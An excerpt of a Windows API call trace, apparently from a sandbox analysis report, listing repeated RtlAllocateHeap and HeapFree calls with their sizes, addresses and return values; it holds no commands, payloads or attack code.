[0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.948] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.948] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.949] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.950] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.951] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.951] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.952] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.956] RtlAllocateHeap 